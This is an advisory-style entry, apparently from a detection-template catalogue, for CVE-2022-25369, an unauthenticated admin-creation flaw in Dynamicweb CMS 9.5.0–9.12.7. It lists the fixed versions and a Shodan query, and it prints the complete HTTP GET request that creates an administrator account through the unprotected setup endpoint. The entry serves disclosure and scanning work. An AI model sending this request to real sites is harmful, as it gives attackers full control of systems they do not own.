| Title | Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation |
|---|---|
| Author | pdteam |
| Severity | Critical |
| Impact | Unauthenticated attackers can create administrative user accounts through the unprotected Default.aspx endpoint, gaining complete control over the Dynamicweb CMS, its content, and potentially the underlying system. |
| Remediation | Upgrade to one of the fixed versions or higher: Dynamicweb 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9, 9.10.18, 9.12.8, or 9.13.0. |
| CVSS Score | 9.8 |
| CVE ID | CVE-2022-25369 |
| CWE ID | CWE-425 |
| Shodan Query | http.component:"Dynamicweb" |
| Tags | cve2022 cve dynamicweb rce unauth vkev vuln |
Dynamicweb contains a vulnerability which allows an unauthenticated attacker to create a new administrative user.
GET /Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername=CIu3U0&adminpassword=KR0Cmh&adminemail=test@test.com&adminname=test HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-25369.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-25369.pcap
N/AN/A